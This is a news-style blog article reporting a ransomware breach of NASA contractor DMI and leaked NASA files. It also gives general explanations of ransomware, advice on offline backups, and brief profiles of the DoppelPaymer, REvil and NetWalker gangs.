A blog post by the hackers pointed out that criminals managed to breach the network of the Maryland-based Digital Management Inc. or DMI. This company provides IT and cyber-security services to several Fortune 100 companies and government agencies in addition to NASA.
Hackers breached and leaked almost 20 archive files belonging to NASA through a portal operated by the gang, including HR documents and project plans. Some of the employee details matched with public LinkedIn records.
Hackers threaten NASA to leak stolen data
2,853 servers and workstations reported being encrypted about during the attack. At this stage, there is no information on whether the whole stolen information belongs to NASA.
The modus behavior of this ransomware is similar to that perpetrated by Maze or REvil. It works by threatening to release data if not paid.
Brenda Ferraro, VP of Third-Party Risk at third-party risk management firm Prevalent said the following on the role that Cryptos continue to play in the increase in ransomware attacks:
“During ransomware attacks, crypto threat intelligence plays a critical role in providing a lens on the real-time dark and deep web sourced blind spots such as; hidden websites, handles, IP addresses and in some cases physical locations. Without in-the-moment crypto intelligence, the victimized networks are open to activity such as ransomware as a service, money laundering services, etc. in Blockchain time.”
Consequences of a Ransomware attack
If the affected files contain valuable data, encrypting them means losing access to that information. If the data is critical to a business – for example, a patient data in a hospital, or payroll details in a finance firm – the loss of access can impact the entire company.
If the affected files are used by the device’s operating system, encrypting them can stop the device from working properly. If the device is critical to a company’s operations – for example, a server, hospital medical equipment, or industrial control system – the business impact can be significant.
In recent years, there have been multiple cases of ransomware spreading through entire company networks, effectively disrupting or even halting normal business until the infected machines can be cleaned and the data recovered.
Latest ransomware attacks by other ransomware gangs
The variety and volume of ransomware done by attackers has continued to grow at a dangerous rate in the last year or so, with pioneering strains such as CryptoLocker, CryptoWall, and others being joined by dozens of new variants. It’s difficult to overstate how much of an effect the emergence of ransomware has had on consumers, enterprises, and the security industry itself. Authorities have been warning users about crypto-ransomware for some time now and have consistently advised victims not to pay any ransoms. Security researchers have been publishing decryption tools for specific ransomware variants and law enforcement agencies have had some success in taking down ransomware gangs.
Three US-based universities were targeted by the NetWalker ransomware not long ago. Also, there are reports on ransomware attack perpetrated against Texas-based data center provider, CyrusOne, by the REvil gang.
To sum up – Crypto-ransomware is a type of harmful program that encrypts files stored on a computer or mobile device in order to extort money.
Encryption ‘scrambles’ the contents of a file, so that it is unreadable. To restore it for normal use, a decryption key is needed to ‘unscramble’ the file.
Crypto-ransomware essentially takes the files hostage, demanding a ransom in exchange for the decryption key needed to restore the files. These kinds of attacks are on a daily rise and cautions need to be taken.
If working with important and secret data, backup all necessary files regularly, and store them in a location not connected to the computer or network. This means that even if your computer is affected, you always have unaffected backups available.
DoppelPaymer: is a ransomware that asks for hundreds of thousands of US dollars in ransom. It is part of the BitPaymer family. The ransomware is aimed at English-speaking users.
REvil: also known as Sodinokibi or Sodin, is a ransomware operation that breaches companies’ networks using spam, exploits, exposed remote desktop services, and hacked managed service providers (MSPs). The gang primarily focuses on big firms and avoids targeting consumers.
NetWalker: Netwalker ransomware attacks that involve malware that is not compiled, but written in PowerShell and executed directly in memory and without storing the actual ransomware binary into the disk.